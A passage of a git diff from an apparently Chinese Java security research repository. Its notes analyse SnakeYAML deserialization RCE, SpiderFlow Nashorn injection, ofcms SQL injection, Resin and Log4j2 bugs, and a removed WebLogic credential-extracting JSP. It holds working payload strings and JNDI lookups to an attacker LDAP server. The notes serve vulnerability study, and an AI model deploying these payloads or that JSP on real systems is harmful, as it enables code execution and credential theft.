方法,生成一个默认的serialVersionUID。 + + + +#### 0x3 解决方案 + +- [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/) 
diff --git a/mechanism/serialization/snakeyaml/note/README.md b/mechanism/serialization/snakeyaml/note/README.md new file mode 100644 index 00000000..48696021 --- /dev/null +++ b/mechanism/serialization/snakeyaml/note/README.md 
@@ -0,0 +1,556 @@ +# 漏洞分析 + +## 反序列化漏洞 + +### 漏洞描述 + +当SnakeYaml.load()方法的参数外部可控时,攻击者传入一个恶意的yaml格式序列化的内容,服务端进行反序列化时加载恶意类触发恶意代码,导致远程代码执行。 + +### 漏洞复现 + +#### 环境搭建 + +pom.xml + +```xml + + + org.yaml + snakeyaml + 1.30 + +``` + +PayloadRunner.java + +```java +import org.yaml.snakeyaml.Yaml; + +public class PayloadRunner { + public static void main(String[] args){ + String evilJar = "xxx"; + Yaml yaml = new Yaml(); + yaml.load(evilJar); + } +} +``` + +#### 漏洞验证 + +##### RCE + +###### 基于 ScriptEngineManager + +利用条件 + +- 不用出网 + +payload + +- https://github.com/artsploit/yaml-payload + +![image-20220125143536995](img/image-20220125143536995.png) + +打包成jar包 + +``` +javac src/artsploit/AwesomeScriptEngineFactory.java +jar -cvf yaml-payload.jar -C src/ . +``` + +![image-20220125143635368](img/image-20220125143635368.png) + +payload-弹计算器 + +```java +String evilJar = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"file:///payload.jar\"]]]]"; +``` + +测试效果 + +![image-20220125143736373](img/image-20220125143736373.png) + +##### JNDI + +###### 基于 JdbcRowSetImpl + +利用条件 + +- 需出网,限制同JNDI + +LDAP服务 + +- JNDIExploit + +![image-20220125144600810](img/image-20220125144600810.png) + +payload-弹计算器 + +```java +String poc = "!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: \"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\"\n autoCommit: true"; +``` + +测试效果 + + ![image-20220125144652166](img/image-20220125144652166.png) + +###### 基于 xbean-reflect + +这是学习[FasterXML jackson-databind](https://github.com/pen4uin/JavaSec/tree/main/jackson-databind)时用到的一条链,照猫画虎,构造payload + +弹计算器 + +```java +String evilText = "!!org.apache.xbean.propertyeditor.JndiConverter\n asText: \"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\""; +``` + +LDAP服务端 + +``` +java -jar .\JNDIExploit-1.4-SNAPSHOT-modified.jar -i 10.10.10.1 +``` + + ![image-20220124164807399](img/image-20220124164807399.png) + +测试效果 + + 
![image-20220125145833353](img/image-20220125145833353.png) + +###### 基于 more gadgets + +经过以上测试的两条链 + +- JdbcRowSetImplfastjson、对应Fastjson +- xbean-reflect、对应Jackson + +推导出SnakeYaml的反序列化可以使用Fastjson 和 Jackson 的利用链,从而得出SnakeYaml的反序列化漏洞的原理【先给出结论再分析】 + +``` +反序列化的过程中调用了setter方法 +``` + + + +### 漏洞分析 + +#### RCE + +##### 基于 ScriptEngineManager + +调试RCE漏洞犹豫在哪下断点的情况时,建议直接下在create()方法处即可,简单直接 + +- java.lang.ProcessImpl#create + +获取调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +:12, AwesomeScriptEngineFactory (artsploit) +newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) +newInstance:62, NativeConstructorAccessorImpl (sun.reflect) +newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect) +newInstance:423, Constructor (java.lang.reflect) +newInstance:442, Class (java.lang) +nextService:380, ServiceLoader$LazyIterator (java.util) +next:404, ServiceLoader$LazyIterator (java.util) +next:480, ServiceLoader1ドル (java.util) +initEngines:122, ScriptEngineManager (javax.script) +init:84, ScriptEngineManager (javax.script) +:75, ScriptEngineManager (javax.script) +newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) +newInstance:62, NativeConstructorAccessorImpl (sun.reflect) +newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect) +newInstance:423, Constructor (java.lang.reflect) +construct:548, Constructor$ConstructSequence (org.yaml.snakeyaml.constructor) +construct:309, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) +constructObjectNoCheck:216, BaseConstructor (org.yaml.snakeyaml.constructor) +constructObject:205, BaseConstructor (org.yaml.snakeyaml.constructor) +constructDocument:164, BaseConstructor (org.yaml.snakeyaml.constructor) +getSingleData:148, BaseConstructor (org.yaml.snakeyaml.constructor) +loadFromReader:525, Yaml 
(org.yaml.snakeyaml) +load:438, Yaml (org.yaml.snakeyaml) +main:11, PayloadRunner (Deserialization.SnakeYAML) +``` + +入口 + +- org.yaml.snakeyaml.Yaml#load(java.lang.String) + +经过以下调用 + + ![image-20220125154705633](img/image-20220125154705633.png) + +执行到 + +- javax.script.ScriptEngineManager#init + +```java +private void init(final ClassLoader loader) { + globalScope = new SimpleBindings(); + engineSpis = new HashSet +-----------------------------37391825482350680435279262019-- +``` + + + + + +![1625380728348](img/1625380728348.png) + diff --git a/other/inxedu/img/1625345482403.png b/other/inxedu/img/1625345482403.png new file mode 100644 index 00000000..a971c96a Binary files /dev/null and b/other/inxedu/img/1625345482403.png differ diff --git a/other/inxedu/img/1625380728348.png b/other/inxedu/img/1625380728348.png new file mode 100644 index 00000000..6740557d Binary files /dev/null and b/other/inxedu/img/1625380728348.png differ diff --git a/other/jeecms/README.md b/other/jeecms/README.md new file mode 100644 index 00000000..d88c6310 --- /dev/null +++ b/other/jeecms/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + +### SSRF + SSTI + Shiro 反序列化 + +- http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/ + diff --git a/other/metersphere/README.md b/other/metersphere/README.md new file mode 100644 index 00000000..916fab2b --- /dev/null +++ b/other/metersphere/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### PluginController Pre-auth RCE + +- https://mp.weixin.qq.com/s/MLZrwHlqjUbF_KMHAxzggw diff --git a/code-audit/01_ofcms/README.md b/other/ofcms/README.md similarity index 74% rename from code-audit/01_ofcms/README.md rename to other/ofcms/README.md index c22b9525..953fdfbb 100644 --- a/code-audit/01_ofcms/README.md +++ b/other/ofcms/README.md @@ -12,11 +12,11 @@ 下载后解压,目录结构如下 -![Untitled](ofcms.assets/Untitled.png) +![Untitled](img/Untitled.png) 右键pom.xml,用IDEA打开,然后等IDEA自动下载好需要的依赖包即可。 -![Untitled](ofcms.assets/Untitled%201.png) +![Untitled](img/Untitled%201.png) 配置数据库 
@@ -37,42 +37,42 @@ - 初始化数据库 - ![Untitled](ofcms.assets/Untitled%202.png) + ![Untitled](img/Untitled%202.png) 选择对应版本导入,勾选ofcms数据库 - ![Untitled](ofcms.assets/Untitled%203.png) + ![Untitled](img/Untitled%203.png) 如图,即为导入成功 - ![Untitled](ofcms.assets/Untitled%204.png) + ![Untitled](img/Untitled%204.png) - 修改数据库配置文件 - ![Untitled](ofcms.assets/Untitled%205.png) + ![Untitled](img/Untitled%205.png) 配置中间件-Tomcat - 配置context,选择要部署的war包 - ![Untitled](ofcms.assets/Untitled%207.png) + ![Untitled](img/Untitled%207.png) - 配置端口等设置 - ![Untitled](ofcms.assets/Untitled%208.png) + ![Untitled](img/Untitled%208.png) - Run - ![Untitled](ofcms.assets/Untitled%209.png) + ![Untitled](img/Untitled%209.png) 如图,成功安装 -![Untitled](ofcms.assets/Untitled%2010.png) +![Untitled](img/Untitled%2010.png) (附:可能出现的问题) -![Untitled](ofcms.assets/Untitled%2011.png) +![Untitled](img/Untitled%2011.png) 至此,环境搭建过程结束。 @@ -80,7 +80,7 @@ 了解待审计的系统的介绍以及使用的技术栈 -![Untitled](ofcms.assets/Untitled%2012.png) +![Untitled](img/Untitled%2012.png) 然后根据所用技术栈选择优先挖掘的漏洞类型 @@ -99,36 +99,36 @@ - [https://cve.circl.lu/search](https://cve.circl.lu/search) -![Untitled](ofcms.assets/Untitled%2013.png) +![Untitled](img/Untitled%2013.png) #### CVE-2019-9615 后台 SQL注入 漏洞描述 -![Untitled](ofcms.assets/Untitled%2014.png) +![Untitled](img/Untitled%2014.png) 定位到漏洞点 - com.ofsoft.cms.admin.controller.system.SystemGenerateController#create -![Untitled](ofcms.assets/Untitled%2015.png) +![Untitled](img/Untitled%2015.png) 跟进方法getPara() - com.jfinal.core.Controller#getPara() - 未作任何过滤 -![Untitled](ofcms.assets/Untitled%2016.png) +![Untitled](img/Untitled%2016.png) 跟进方法update,到com.jfinal.plugin.activerecord.DbPro#update()建立数据库连接 -![Untitled](ofcms.assets/Untitled%2017.png) +![Untitled](img/Untitled%2017.png) 跟进方法this.update(); - com.jfinal.plugin.activerecord.DbPro#update() -![Untitled](ofcms.assets/Untitled%2018.png) +![Untitled](img/Untitled%2018.png) 至此处理流程结束,漏洞产生的原因也很清晰: 
@@ -146,19 +146,19 @@ update of_cms_ad set ad_id = updatexml(1,concat(0x7e,(user())),0) where ad_id = 漏洞效果 -![Untitled](ofcms.assets/Untitled%2019.png) +![Untitled](img/Untitled%2019.png) #### CVE-2019-9610 后台 目录遍历 漏洞描述 -![Untitled](ofcms.assets/Untitled%2020.png) +![Untitled](img/Untitled%2020.png) 定位到漏洞点 - com.ofsoft.cms.admin.controller.cms.TemplateController#getTemplates -![Untitled](ofcms.assets/Untitled%2021.png) +![Untitled](img/Untitled%2021.png) 通过方法getPara()获取参数 @@ -172,29 +172,29 @@ update of_cms_ad set ad_id = updatexml(1,concat(0x7e,(user())),0) where ad_id = - com.ofsoft.cms.admin.controller.system.SystemUtile#getSiteTemplateResourcePath -![Untitled](ofcms.assets/Untitled%2022.png) +![Untitled](img/Untitled%2022.png) 回到之前的地方,通过getPara()获取参数file_name,判断文件是否存在 -![Untitled](ofcms.assets/Untitled%2023.png) +![Untitled](img/Untitled%2023.png) 然后通过FileUtils.readString()读取文件内容 -![Untitled](ofcms.assets/Untitled%2024.png) +![Untitled](img/Untitled%2024.png) 跟进 - com.ofsoft.cms.core.uitle.FileUtils#readString -![Untitled](ofcms.assets/Untitled%2025.png) +![Untitled](img/Untitled%2025.png) 读取文件,并把文件内容写入缓存,设置编码 -![Untitled](ofcms.assets/Untitled%2026.png) +![Untitled](img/Untitled%2026.png) 这里敏感字符进行了替换,并使用setAttr方法保存变量fileContent & editFile。 -![Untitled](ofcms.assets/Untitled%2027.png) +![Untitled](img/Untitled%2027.png) 最后通过render()方法进行渲染并返回给客户端。 @@ -210,5 +210,4 @@ payload 漏洞效果 -![Untitled](ofcms.assets/Untitled%2028-1.png) - +![Untitled](img/Untitled%2028-1.png) diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 1.png b/other/ofcms/img/Untitled 1.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 1.png rename to other/ofcms/img/Untitled 1.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 10.png b/other/ofcms/img/Untitled 10.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 10.png rename to other/ofcms/img/Untitled 10.png 
diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 11.png b/other/ofcms/img/Untitled 11.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 11.png rename to other/ofcms/img/Untitled 11.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 12.png b/other/ofcms/img/Untitled 12.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 12.png rename to other/ofcms/img/Untitled 12.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 13.png b/other/ofcms/img/Untitled 13.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 13.png rename to other/ofcms/img/Untitled 13.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 14.png b/other/ofcms/img/Untitled 14.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 14.png rename to other/ofcms/img/Untitled 14.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 15.png b/other/ofcms/img/Untitled 15.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 15.png rename to other/ofcms/img/Untitled 15.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 16.png b/other/ofcms/img/Untitled 16.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 16.png rename to other/ofcms/img/Untitled 16.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 17.png b/other/ofcms/img/Untitled 17.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 17.png rename to other/ofcms/img/Untitled 17.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 18.png b/other/ofcms/img/Untitled 18.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 18.png rename to other/ofcms/img/Untitled 18.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 19.png b/other/ofcms/img/Untitled 19.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 19.png rename to other/ofcms/img/Untitled 19.png 
diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 2.png b/other/ofcms/img/Untitled 2.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 2.png rename to other/ofcms/img/Untitled 2.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 20.png b/other/ofcms/img/Untitled 20.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 20.png rename to other/ofcms/img/Untitled 20.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 21.png b/other/ofcms/img/Untitled 21.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 21.png rename to other/ofcms/img/Untitled 21.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 22.png b/other/ofcms/img/Untitled 22.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 22.png rename to other/ofcms/img/Untitled 22.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 23.png b/other/ofcms/img/Untitled 23.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 23.png rename to other/ofcms/img/Untitled 23.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 24.png b/other/ofcms/img/Untitled 24.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 24.png rename to other/ofcms/img/Untitled 24.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 25.png b/other/ofcms/img/Untitled 25.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 25.png rename to other/ofcms/img/Untitled 25.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 26.png b/other/ofcms/img/Untitled 26.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 26.png rename to other/ofcms/img/Untitled 26.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 27.png b/other/ofcms/img/Untitled 27.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 27.png rename to other/ofcms/img/Untitled 27.png 
diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 28-1.png b/other/ofcms/img/Untitled 28-1.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 28-1.png rename to other/ofcms/img/Untitled 28-1.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 3.png b/other/ofcms/img/Untitled 3.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 3.png rename to other/ofcms/img/Untitled 3.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 4.png b/other/ofcms/img/Untitled 4.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 4.png rename to other/ofcms/img/Untitled 4.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 5.png b/other/ofcms/img/Untitled 5.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 5.png rename to other/ofcms/img/Untitled 5.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 7.png b/other/ofcms/img/Untitled 7.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 7.png rename to other/ofcms/img/Untitled 7.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 8.png b/other/ofcms/img/Untitled 8.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 8.png rename to other/ofcms/img/Untitled 8.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 9.png b/other/ofcms/img/Untitled 9.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 9.png rename to other/ofcms/img/Untitled 9.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled.png b/other/ofcms/img/Untitled.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled.png rename to other/ofcms/img/Untitled.png diff --git a/other/spider flow/README.md b/other/spider flow/README.md new file mode 100644 index 00000000..3abbcab1 --- /dev/null +++ b/other/spider flow/README.md 
@@ -0,0 +1,86 @@ +### SpiderFlow RCE via Nashorn + +#### 前置知识 + +— Nashorn是什么?怎么用? + +##### What + +Nashorn是于Java 8中用于取代Rhino(Java 6,Java 7)的JavaScript引擎。 + +##### How + +> 实现如何用Nashorn在Java中执行JS代码即可 + +![image-20220102181550828](img/image-20220102181550828.png) + +测试效果 + +![image-20220102181612329](img/image-20220102181612329.png) + +##### RCE + +Nashorn定义了一个称为Java的新的全局对象,它包含许多有用的函数来使用Java包和类。 + +Java对象的` type()`函数将Java类型导入脚本中。 + +示例 + +![image-20220102182241321](img/image-20220102182241321.png) + +那么如何弹计算器的呢? + +示例 + +```java +package org.spiderflow.demo; + +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; +class JsFromJava{ + public static void main(String args[]) throws Exception { + String evilJs="var RCETest= Java.type(\"java.lang\"+\".Runtime\"); var rt = RCETest.getRuntime(); rt.exec(\"calc\");"; + ScriptEngineManager manager = new ScriptEngineManager(null); + ScriptEngine engine = manager.getEngineByName("nashorn"); + engine.eval(evilJs); + } +} +``` + +![image-20220102182630383](img/image-20220102182630383.png) + +#### 审计思路 + +有了上面的测试,审计这类漏洞尝试搜索`.eval(`等关键字即可,然后再看看源码是否实现`jdk.nashorn.api.scripting.ClassFilter`进行了过滤。 + +#### 漏洞复现 + +- 全局搜索`.eval(` + +![image-20220102183719108](img/image-20220102183719108.png) + +- 跟进 + + - org.spiderflow.core.script.ScriptManager#registerFunction + + ![image-20220102184652005](img/image-20220102184652005.png) + + - org.spiderflow.core.script.ScriptManager#concatScript + + ![image-20220102184309834](img/image-20220102184309834.png) + +- 构造payload,闭合一下 + + ```js + # function+functionName+(+parameters+)+{+script+} + functionName: rce + parameters: demo + script: }Java.type("java.lang.Runtime").getRuntime().exec('calc');{ + # function rce(){demo}Java.type("java.lang.Runtime").getRuntime().exec('calc');{} + ``` + + 复现效果: + + ![image-20220102191038717](img/image-20220102191038717.png) + + 
diff --git a/other/spider flow/img/image-20220102181550828.png b/other/spider flow/img/image-20220102181550828.png new file mode 100644 index 00000000..08f023ff Binary files /dev/null and b/other/spider flow/img/image-20220102181550828.png differ diff --git a/other/spider flow/img/image-20220102181612329.png b/other/spider flow/img/image-20220102181612329.png new file mode 100644 index 00000000..e8cf93d2 Binary files /dev/null and b/other/spider flow/img/image-20220102181612329.png differ diff --git a/other/spider flow/img/image-20220102182241321.png b/other/spider flow/img/image-20220102182241321.png new file mode 100644 index 00000000..6646fe4c Binary files /dev/null and b/other/spider flow/img/image-20220102182241321.png differ diff --git a/other/spider flow/img/image-20220102182630383.png b/other/spider flow/img/image-20220102182630383.png new file mode 100644 index 00000000..89af7359 Binary files /dev/null and b/other/spider flow/img/image-20220102182630383.png differ diff --git a/other/spider flow/img/image-20220102183719108.png b/other/spider flow/img/image-20220102183719108.png new file mode 100644 index 00000000..35c4b728 Binary files /dev/null and b/other/spider flow/img/image-20220102183719108.png differ diff --git a/other/spider flow/img/image-20220102184309834.png b/other/spider flow/img/image-20220102184309834.png new file mode 100644 index 00000000..2710f8bf Binary files /dev/null and b/other/spider flow/img/image-20220102184309834.png differ diff --git a/other/spider flow/img/image-20220102184652005.png b/other/spider flow/img/image-20220102184652005.png new file mode 100644 index 00000000..76ee1928 Binary files /dev/null and b/other/spider flow/img/image-20220102184652005.png differ diff --git a/other/spider flow/img/image-20220102191038717.png b/other/spider flow/img/image-20220102191038717.png new file mode 100644 index 00000000..cfaa4a90 Binary files /dev/null and b/other/spider flow/img/image-20220102191038717.png differ 
diff --git a/vulnerability-analysis/log4j2/README.md b/vulnerability-analysis/log4j2/README.md deleted file mode 100644 index b3e0435e..00000000 --- a/vulnerability-analysis/log4j2/README.md +++ /dev/null @@ -1,50 +0,0 @@ -**注:** -``` -# 本文仅供安全研究使用 👨‍✈️ -这里想提一嘴,看到很多人在"疯狂"地测dnslog,其实还是希望在没有授权情况下最好不要进行漏洞探测/攻击行为,毕竟"自律是自由的基础"! 👨‍✈️ -``` - -### 漏洞分析 - -根据流传的payload搭建测试环境 - -- log4j_rce.java - -```java -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class log4j_rce { - private static final Logger logger = LogManager.getLogger(log4j_rce.class); - public static void main(String[] args) { - logger.error("暂时打码处理"}"); - } -} -``` - -一步一步跟进,最后跟到 -- org.apache.logging.log4j.core.lookup.Interpolator#lookup - -![image](https://user-images.githubusercontent.com/55024146/145439561-9dc12330-6705-4297-aeef-42413a4edc21.png) - -似乎就是这里,测下断点,调试 - -![image](https://user-images.githubusercontent.com/55024146/145439835-a4d042d7-80b9-47ca-a65b-8dcb24ee6bd1.png) - -答案呼之欲出,lookup + jndi! - -其实这里可以触发的不只是error,默认情况下fatal也可以,即便实际的业务场景肯定会有所不同(只会更多)。 - -### 漏洞复现 - -起一个恶意的LDAPRefServer、恶意类Evil - -![image](https://user-images.githubusercontent.com/55024146/145442280-7bfa4038-276e-414b-b0b6-2c1dc6e92e74.png) - -然后触发即可 - -![image](https://user-images.githubusercontent.com/55024146/145458787-4acd92c0-50db-40dc-b4cb-6d49014e53ac.png) - - - - diff --git a/vulnerability-analysis/resin/README.md b/vulnerability-analysis/resin/README.md deleted file mode 100644 index 1a66c7bd..00000000 --- a/vulnerability-analysis/resin/README.md +++ /dev/null 
@@ -1,155 +0,0 @@ -**目录** -- 0x01-支持.jspf后缀 -- 0x02-类IIS6.0的解析漏洞 -- 0x03-Resin 4.0.36 信息泄露漏洞(ZSL-2013-5144) - - -### 0x01-支持.jspf后缀 -配置文件 - -> E:\Resin\resin-4.0.65\conf\app-default.xml - -![image](https://user-images.githubusercontent.com/55024146/144174160-82c02d3b-a775-4b71-acaf-d9f03f2b3653.png) - -可见Resin不仅支持.jsp、.jspx,也支持.jspf。 - -```jsp -<% - response.getWriter().write("Hello Resin !!!"); -%> -``` -![image](https://user-images.githubusercontent.com/55024146/144174179-d1e5af4c-c1cc-4f41-a5da-7fa2eb977b66.png) - -### 0x02-类IIS6.0的解析漏洞 - -先看测试效果图 - -![image](https://user-images.githubusercontent.com/55024146/144174242-db437f8b-0feb-4683-8e46-7e7586905a15.png) - -希望传达的意思 - -- 若文件夹名为`xxx.jsp`,其中放置的任意后缀的文件都将被当作JSP文件解析。 - -#### 1、为什么会这样? - -分三步跟一下http请求的处理过程,来到关键函数下个断点 - -- com.caucho.server.dispatch.UrlMap#map - -**第1步:jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174286-61ce59f9-da8f-47da-bb5a-60c65de85aab.png) - -![image](https://user-images.githubusercontent.com/55024146/144174296-2f6a4527-c1bb-4199-b5b9-d108216991bc.png) - -正常进入jsp的解析逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174317-03477b55-7f9c-4550-9e06-cb21fb4cd300.png) - -**第2步:非jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174351-15c3b0f6-df52-4c02-9322-bb0f76a3b2bf.png) - -![image](https://user-images.githubusercontent.com/55024146/144174357-ba30fda0-d499-4929-8234-f0778f09039b.png) - -进入resin-file的处理逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174378-bf20140b-fedf-4507-bef2-445187820ab2.png) - -处理结果 - -![image](https://user-images.githubusercontent.com/55024146/144174406-2259125d-b101-4073-94d5-01b8f9d67d96.png) - -**第3步:x.jsp文件夹 + 非.jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174432-3c2e4d49-7cc2-48ae-928e-60c9af933411.png) - -![image](https://user-images.githubusercontent.com/55024146/144174451-3cd87542-0dad-41de-ad7f-48a9359d8ef2.png) - 
-![image](https://user-images.githubusercontent.com/55024146/144174460-5f803d3c-8b6f-42e6-9f81-4def07970343.png) - -也进入resin-file的处理逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174477-b242ffb6-6d62-442c-98a7-ea6a7cb11206.png) - -#### 2、造成这种处理差异的原理是什么? - -![image](https://user-images.githubusercontent.com/55024146/144174511-0cdabaf9-33c1-4c6e-aca5-c27c4ade0801.png) - -map方法将会对url路径进行正则表达式,然后根据匹配结果进入不同的处理逻辑 - -> /hello.jsp - -![image](https://user-images.githubusercontent.com/55024146/144174547-64dc2dba-d06b-4591-8f01-3ad408648d96.png) - -> /hello.hello - -![image](https://user-images.githubusercontent.com/55024146/144174573-43a536d0-d35f-40e2-8ecd-0b79f1d66723.png) - -> /x.jsp/hello.hello - -![image](https://user-images.githubusercontent.com/55024146/144174584-858aca20-2946-4f46-808d-7da2c1b733ad.png) - - -### 0x03 Resin 4.0.36 信息泄露漏洞(ZSL-2013-5144) - -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5144.php - -测试效果 -> 读取index.jsp - -![image](https://user-images.githubusercontent.com/55024146/144178194-d2717d65-d9ed-4f3c-8903-4f4a624d848f.png) - -> 读取resin-admin.xml - -![image](https://user-images.githubusercontent.com/55024146/144181449-d6b81379-429e-49a0-b02a-72c5c860b6d2.png) - - -#### 漏洞分析 - -从上面的分析中知道了可以从com.caucho.server.dispatch.UrlMap观察resin对http请求的处理逻辑,下断点调试 - -![image](https://user-images.githubusercontent.com/55024146/144178592-1ee0f23f-5b67-4cd7-8dc4-a0437cb67168.png) - -一路跟到`ServletMapping` - -![image](https://user-images.githubusercontent.com/55024146/144178671-718bf816-6494-4676-a40f-3b46d9f10c74.png) - -很明显,到这里应该就知道漏洞成因估计是该版本的resin-web.xml默认添加了路由为/viewfile/*的servlet - -文件位置 -> E:\Resin\resin-pro-4.0.36\doc\resin-doc\WEB-INF\resin-web.xml - -![image](https://user-images.githubusercontent.com/55024146/144179072-662fff09-1c54-4ee2-a25b-923a542aaf40.png) - -跟进对应的类 -- com.caucho.doc.ViewFileServlet - -![image](https://user-images.githubusercontent.com/55024146/144179200-719d6a33-731d-402d-9907-cc15ea2ca4bf.png) - - -继续断点 - 
-![image](https://user-images.githubusercontent.com/55024146/144179705-96c69246-482e-43d3-8d96-b3181bc2c07c.png) - -然后通过viewFile打印文件内容 - -![image](https://user-images.githubusercontent.com/55024146/144183728-c145ad4b-eca7-4ee1-866c-e6c039910117.png) - - -![image](https://user-images.githubusercontent.com/55024146/144183814-9994ff06-4e7a-458b-92c1-c881e1834c82.png) - - - - - - - - - - - - - - - diff --git a/vulnerability-analysis/weblogic/README.md b/vulnerability-analysis/weblogic/README.md deleted file mode 100644 index 648e4628..00000000 --- a/vulnerability-analysis/weblogic/README.md +++ /dev/null 
@@ -1,56 +0,0 @@ -目录 -- 01 获取Weblogic console用户名&密码(免解密)-getPass.jsp - - -### 获取Weblogic console用户名&密码(免解密)-getPass.jsp - -以往遇上weblogic的站点时都是通过密钥进行解密获取console的密码,甚至但是解密方法就出现好几种, - -![image](https://user-images.githubusercontent.com/55024146/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac.png) - -但是前几个小时在twitter @jas502n师傅公开了[Use T3 protocol Get weblogic console username, password](https://twitter.com/jas502n/status/1467122190760177664)这个姿势,于是赶紧学习学习!!! - - -断点看看代码细节: - -![image](https://user-images.githubusercontent.com/55024146/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5.png) - -代码实现 - -> ```jsp -> <%@page import="java.lang.reflect.Field" %> -> <%@page import="java.lang.reflect.Method" %> -> -> <% -> /** -> * 已测试: -> * 10.3.6.0 -> */ -> try{ -> ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); -> Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"); -> Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService"); -> Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject"); -> Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService"); -> Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID"); -> KERNE_ID.setAccessible(true); -> Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject); -> getPropertyService.setAccessible(true); -> Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null)); -> Method getTimestamp1 = propertyService.getMethod("getTimestamp1"); -> getTimestamp1.setAccessible(true); -> Method getTimestamp2 = propertyService.getMethod("getTimestamp2"); -> getTimestamp2.setAccessible(true); -> String username = (String) getTimestamp1.invoke(prop); -> String password = (String) getTimestamp2.invoke(prop); -> response.getWriter().write( username + "/" + 
